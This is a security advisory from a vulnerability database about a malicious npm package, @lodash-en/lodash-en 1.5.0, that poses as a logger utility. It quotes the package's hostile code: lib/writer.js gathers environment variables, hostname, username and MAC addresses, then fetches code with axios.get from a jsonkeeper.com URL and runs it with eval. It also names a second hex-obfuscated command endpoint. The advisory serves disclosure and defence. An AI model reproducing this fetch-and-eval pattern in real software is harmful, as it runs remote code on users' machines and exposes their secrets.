VDB

GCVE-110-OSM-2026-1363

GCVE-110-OSM-2026-1363
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 4, 2026
Executes remote second-stage code fetched from attacker-controlled domain www.jsonkeeper.com (https://www.jsonkeeper.com/b/HQJXY) via axios.get + eval in lib/writer.js, with full process.env, hostname, username, and MAC addresses staged in a data object in closure scope. A secondary C2 endpoint (https://www.jsonkeeper.com/b/HY6M6) is constructed via hex-obfuscation using the same axios.get pattern. Masquerades as a lodash/pino logger utility; package now fully unpublished. lib/writer.js collects data = { ...process.env, platform, hostname, username, macAddresses } then calls require('axios').get('https://www.jsonkeeper.com/b/HQJXY').then(r => { eval(r.data.content); }). The eval'd content executes with the data object in scope. A second C2 (https://www.jsonkeeper.com/b/HY6M6) is hex-encoded in hl array, using the same axios.get chain — shared infrastructure with sibling package fastjsonlog.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@lodash-en/lodash-en1.5.0 (affected)

Browse GCVE Records

72,921 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›